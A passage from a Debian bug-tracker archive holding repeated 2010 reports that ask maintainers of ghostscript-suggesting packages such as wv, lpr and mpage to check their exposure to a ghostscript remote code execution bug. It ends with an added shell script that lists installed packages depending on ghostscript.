ii  spell  1.0-20GNU Spell, a clone of Unix `spell'
ii  xfig-doc   1:3.2.5-rel-3 XFig on-line documentation and exa

-- no debconf information



Bug#584066: xapian-omega: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: xapian-omega
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash



Bug#584065: wv: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: wv
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages wv depends on:
ii  libc6  2.7-18lenny2  GNU C Library: Shared libraries
ii  libexpat1  2.0.1-4+lenny3XML parsing C library - runtime li
ii  libfreetype6   2.3.7-2+lenny1FreeType 2 font engine, shared lib
pn  libglib1.2 (no description available)
ii  libjpeg62  6b-14 The Independent JPEG Group's JPEG 
pn  libpng2(no description available)
pn  libwmf0.2-2(no description available)
pn  xlibs  (no description available)
ii  zlib1g 1:1.2.3.3.dfsg-12 compression library - runtime

wv recommends no packages.

Versions of packages wv suggests:
ii  evince [postscript 2.22.2-4~lenny1   Document (postscript, pdf) viewer
ii  ghostscript [posts 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF
ii  ghostscript-x [gs] 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF
ii  gs 8.62.dfsg.1-3.2lenny1 Transitional package
ii  gv [postscript-vie 1:3.6.5-2 PostScript and PDF viewer for X
ii  kghostview [postsc 4:3.5.9-3+lenny3  PostScript viewer for KDE
pn  libwmf-bin (no description available)
ii  lynx   2.8.7dev9-2.1 Text-mode WWW Browser (transitiona
ii  tetex-bin  2007.dfsg.2-1~lenny2  TeX Live: teTeX transitional packa
ii  tetex-extra2007.dfsg.2-1~lenny2  TeX Live: teTeX transitional packa



Bug#584064: texlive-base-bin: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: texlive-base-bin
Version: 2007.dfsg.2-4+lenny2
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages texlive-base-bin depends on:
ii  ed  0.7-3The classic unix line editor
ii  libc6   2.7-18lenny2 GNU C Library: Shared libraries
ii  libgcc1 1:4.3.2-1.1  GCC support library
ii  libkpathsea42007.dfsg.2-4+lenny2 TeX Live: path search library for 
ii  libncurses5 5.7+20081213-1   shared libraries for terminal hand
ii  libpng12-0  1.2.27-2+lenny3  PNG library - runtime
ii  libpoppler3 0.8.7-3  PDF rendering library
ii  libstdc++6  4.3.2-1.1The GNU Standard C++ Library v3
ii  libx11-62:1.1.5-2X11 client-side library
ii  libxaw7 2:1.0.4-2X11 Athena Widget library
ii  libxmu6 2:1.0.4-1X11 miscellaneous utility library
ii  libxpm4 1:3.5.7-1X11 pixmap library
ii  libxt6  1:1.0.5-3X11 toolkit intrinsics library
ii  mime-support3.44-1   MIME files 'mime.types' & 'mailcap
ii  perl5.10.0-19lenny2  Larry Wall's Practical Extraction 
ii  tex-common  1.11.3   common infrastructure for building
ii  texlive-common  2007.dfsg.2-1~lenny2 TeX Live: Base component
ii  zlib1g  1:1.2.3.3.dfsg-12compression library - runtime

Versions of packages texlive-base-bin recommends:
ii  texlive-base-bin-do 2007.dfsg.2-4+lenny2 TeX Live: Documentation files for 

Versions of packages texlive-base-bin suggests:
ii  evince [postscript 2.22.2-4~lenny1   Document (postscript, pdf) viewer
ii  ghostscript [posts 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF
ii  gv [postscript-vie 1:3.6.5-2 PostScript and PDF viewer for X
ii  kghostview [postsc 4:3.5.9-3+lenny3  PostScript viewer for KDE
ii  kpdf [pdf-viewer]  4:3.5.9-3+lenny3  PDF viewer for KDE
ii  perl-tk1:804.028-1+b1Perl module providing the Tk graph
ii  xpdf-reader [pdf-v 3.02-1.4+lenny2   Portable Document Format (PDF) sui
ii  xpdf-utils [pdf-vi 3.02-1.4+lenny2   Portable Document Format (PDF) sui

Versions of packages tex-common depends on:
ii  debconf   1.5.24 Debian configuration management sy
ii  ucf   3.0016 Update Configuration File: preserv

Versions of packages texlive-base-bin is related to:
ii  tetex-base  2007.dfsg.2-1~lenny2 TeX Live: teTeX transitional packa
ii  tetex-bin   2007.dfsg.2-1~lenny2 TeX Live: teTeX transitional packa
ii  tetex-extra 2007.dfsg.2-1~lenny2 TeX Live: teTeX transitional packa
ii  tex-common  1.11.3   common infrastructure for building

-- debconf information excluded



Bug#584063: tex4ht-common: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: tex4ht-common
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash



Bug#584062: sdf: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: sdf
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages sdf depends on:
ii  perl 5.10.0-19lenny2 Larry Wall's Practical Extraction 

sdf recommends no packages.

Versions of packages sdf suggests:
ii  ghostscript-x [gs] 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF
ii  gs 8.62.dfsg.1-3.2lenny1 Transitional package
pn  htmldoc(no description available)
ii  perl-doc   5.10.0-19lenny2   Perl documentation
pn  sdf-doc(no description available)
pn  sgmltools-lite (no description available)
ii  tetex-bin  2007.dfsg.2-1~lenny2  TeX Live: teTeX transitional packa



Bug#584061: recoll: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: recoll
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash



Bug#584060: python-codespeak-lib: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: python-codespeak-lib
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash



Bug#584059: plywood: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: plywood
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash



Bug#584058: opensched: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: opensched
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash



Bug#584057: mpage: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: mpage
Version: 2.5.4-2
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages mpage depends on:
ii  libc6   2.7-18lenny2 GNU C Library: Shared libraries
ii  libpaper1   1.1.23+nmu1  library for handling paper charact

mpage recommends no packages.

Versions of packages mpage suggests:
ii  ghostscript-x [gs] 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF
ii  gs 8.62.dfsg.1-3.2lenny1 Transitional package

-- no debconf information



Bug#584056: mgetty-fax: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: mgetty-fax
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages mgetty-fax depends on:
ii  cron 3.0pl1-105  management of regular background p
ii  libc62.7-18lenny2GNU C Library: Shared libraries
pn  mgetty (no description available)
ii  perl [perl5] 5.10.0-19lenny2 Larry Wall's Practical Extraction 

Versions of packages mgetty-fax recommends:
ii  metamail  2.7-54 implementation of MIME

Versions of packages mgetty-fax suggests:
ii  debianutils2.30  Miscellaneous utilities specific t
ii  ghostscript-x [gs- 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF
ii  gs 8.62.dfsg.1-3.2lenny1 Transitional package
ii  gs-aladdin 8.62.dfsg.1-3.2lenny1 Transitional package
pn  mgetty-viewfax (no description available)
ii  netpbm [pnmtopng]  2:10.0-12+lenny1  Graphics conversion tools






Bug#584055: lpr: Security bugs in ghostscript

2010-05-31 Thread Paul Szabo
Package: lpr
Severity: grave
Tags: security
Justification: user security hole


Please note remote execute-any-code security bugs in ghostscript:

  http://bugs.debian.org/583183

This package suggests ghostscript, and may be affected. Please
evaluate the security of this package, and fix if needed.

Thanks,

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia


-- System Information:
Debian Release: 5.0.4
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages lpr depends on:
ii  libc6   2.7-18lenny2 GNU C Library: Shared libraries
ii  netbase 4.34 Basic TCP/IP networking system

lpr recommends no packages.

Versions of packages lpr suggests:
ii  ghostscript-x [gs] 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF
ii  gs 8.62.dfsg.1-3.2lenny1 Transitional package
pn  magicfilter | apsf (no description available)



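The three reports above (mpage, mgetty-fax, lpr) were filed by hand against packages whose Suggests field names ghostscript. The shell script below is an added example, not part of the bug reports or of any Debian tooling: it parses records in dpkg status-file format and prints every installed package whose Depends, Recommends or Suggests name a ghostscript package, so an administrator can enumerate the packages that may hand untrusted input to gs. The status records embedded in it are constructed for the example, and the set of package names it matches (ghostscript, ghostscript-x, gs, gs-aladdin, the names that appear in the reports' version tables) is an assumption; extend the pattern for other ghostscript providers.

```shell
#!/bin/sh
# Added example: find installed packages that depend on, recommend or suggest
# ghostscript, by parsing dpkg status-file records. Not from the bug reports.

# Constructed sample in /var/lib/dpkg/status format (not a real system's data).
# It exercises alternatives ("ghostscript | gs"), a wrapped field (the leading
# space on the continuation line), version constraints, an architecture
# qualifier, and a package that is removed but still has config files.
STATUS_SAMPLE='Package: lpr
Status: install ok installed
Version: 1:2008.05.17
Depends: libc6 (>= 2.7-1), netbase
Suggests: ghostscript | gs,
 magicfilter | apsfilter

Package: mpage
Status: install ok installed
Version: 2.5.4-2
Depends: libc6 (>= 2.7-1), libpaper1 (>= 1.1.23) [i386]
Suggests: ghostscript

Package: oldprinter
Status: deinstall ok config-files
Version: 1.0-1
Depends: gs-aladdin

Package: bar
Status: install ok installed
Version: 2.0
Depends: libc6
'

# gs_rdepends FIELDS < status-file
#   FIELDS is a comma-separated list of relationship fields to inspect.
#   Prints one "package field target" line per installed package whose listed
#   fields name a ghostscript package. Continuation lines are re-joined,
#   alternatives are split on "|", and version constraints "(>= x)" and
#   architecture qualifiers "[i386]" are stripped before matching.
#   The matched names are an assumption taken from the reports' version tables.
gs_rdepends() {
    awk -v fields="$1" '
    BEGIN { RS = ""; FS = "\n"; nwant = split(fields, want, ",") }
    {
        # Re-join continuation lines (leading space or tab) into logical fields.
        nl = 0
        split("", line)
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^[ \t]/ && nl > 0) line[nl] = line[nl] " " $i
            else line[++nl] = $i
        }
        # Only fully installed packages can run gs; removed ones are skipped.
        pkg = ""; installed = 0
        for (i = 1; i <= nl; i++) {
            if (line[i] ~ /^Package: /) pkg = substr(line[i], 10)
            if (line[i] ~ /^Status: .* installed$/) installed = 1
        }
        if (!installed) next
        for (i = 1; i <= nl; i++) {
            for (k = 1; k <= nwant; k++) {
                if (index(line[i], want[k] ": ") != 1) continue
                rel = substr(line[i], length(want[k]) + 3)
                nitems = split(rel, items, ",")
                for (j = 1; j <= nitems; j++) {
                    nalts = split(items[j], alts, "[|]")
                    for (a = 1; a <= nalts; a++) {
                        name = alts[a]
                        sub(/ *\[.*\]/, "", name)   # drop architecture qualifier
                        sub(/ *\(.*\)/, "", name)   # drop version constraint
                        gsub(/[ \t]/, "", name)
                        if (name ~ /^(ghostscript|ghostscript-x|gs|gs-aladdin)$/)
                            print pkg, want[k], name
                    }
                }
            }
        }
    }'
}

# Run on the constructed sample. On a live Debian system use instead:
#   gs_rdepends "Depends,Recommends,Suggests" < /var/lib/dpkg/status
printf '%s' "$STATUS_SAMPLE" | gs_rdepends "Depends,Recommends,Suggests"
```

Each package the script prints is a candidate for the same review the reports ask for: whether it invokes gs on input a remote party controls (print jobs, incoming faxes, mailed PostScript), in which case the ghostscript bug becomes that package's bug too. Restricting FIELDS to Depends alone narrows the list to packages that cannot run without ghostscript.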


